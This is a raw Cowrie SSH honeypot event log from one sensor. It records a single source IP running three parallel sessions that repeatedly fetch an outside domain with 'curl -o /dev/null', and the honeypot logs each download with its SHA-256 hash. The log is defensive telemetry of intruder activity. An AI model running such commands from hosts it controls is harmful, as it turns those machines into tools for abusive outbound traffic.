{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.796165Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.803006Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.804659Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.809502Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.839990Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.840852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.843952Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.845303Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.851090Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.852226Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.858737Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.887156Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.891187Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.892009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.895519Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.896610Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.902690Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.903581Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.936455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.938113Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.941499Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.942956Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.943837Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.947926Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.948761Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.950580Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.951474Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.982655Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.984710Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.988507Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.990751Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.994302Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.996138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.997094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.000634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.003379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.006180Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.008902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.013135Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.013759Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.018997Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.020489Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.021579Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.024964Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.050837Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.051658Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.058850Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.061615Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.065292Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.067283Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.070451Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.085764Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.087743Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.089936Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.090694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.095323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.100630Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.101302Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.104416Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.109069Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.126932Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.127756Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.144427Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.149017Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.151250Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.152488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.153963Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.154482Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.171594Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.172406Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
